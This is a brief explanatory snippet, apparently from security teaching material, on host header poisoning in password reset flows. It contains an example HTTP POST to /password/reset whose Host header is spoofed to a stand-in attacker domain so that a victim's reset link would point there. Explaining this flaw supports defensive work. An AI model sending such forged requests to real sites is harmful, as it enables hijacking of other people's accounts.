Host Header Poisoning

All an attacker has to do is request a password reset for a victim, and set the Host header to a domain they (the attacker) controls.

A Spoofed Host Header
 POST /password/reset HTTP/1.1
Host: malicious.com
Content-Type: application/x-www-form-urlencoded

email=victim@gmail.com